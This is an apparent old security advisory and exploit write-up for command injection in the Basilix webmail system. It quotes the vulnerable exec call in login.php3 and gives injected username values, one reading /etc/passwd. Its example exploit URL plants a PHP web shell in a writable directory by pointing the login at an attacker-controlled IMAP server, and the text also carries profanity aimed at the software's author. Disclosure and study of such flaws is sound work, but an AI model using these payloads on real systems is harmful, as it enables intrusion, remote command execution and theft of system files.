Basilix Webmail System - executing command

Version Affected :
Basilix 1.0.2/3 series

Bug:
There is a bug in Basilix package
which allows to execute any command
on attacked system. The bug has been
known since June, but Author of
basilix is a dick so fuck you.

from file login.php3 :
$atch_dir = $BSX_ATCH_DIR . "/" . "$IMAP_DOMAIN" . "/" ."$username";
.
.
.
$mkcmd = "/bin/mkdir -p $atch_dir";
@exec($mkcmd);

we can pass evil username e.g. username=blah;cat%20/etc/passwd
but it will fail because the script tries to connect to imap server
and authenticate with username and password. To pass through this 
check we must set up a fake imap server or somethilg like that.
We can pass the address and port of imap server, so it's not a problem.


Example Exploit :

victim.host/basilix.php3?username=blah;echo%20"<?system(\$cmd);?>">js/blah.php&password=blah&RequestID=LOGIN&domain=blah&bsx_domains[blah][imap_host]=blah.com.pl&bsx_domains[blah][imap_port]=143&bsx_domains[blah][domain]=su.th3_tick&nocookie=1&BSX_TestCookie=1&SESSID=1

if you don't write fake imap, you must add username to /etc/passwd 
and /etc/shadow and set him password.

directory presents in username (js)  should be writable ( normally is ).
you can of course write to tmp or others, but you must use other bug 
( see bugtraq, also mine ;) to access it.

last three variables are set to stop script to check if cookies are set. <- stupid sentence


Karol Wiesek - appelast<appelast@cdp.pl>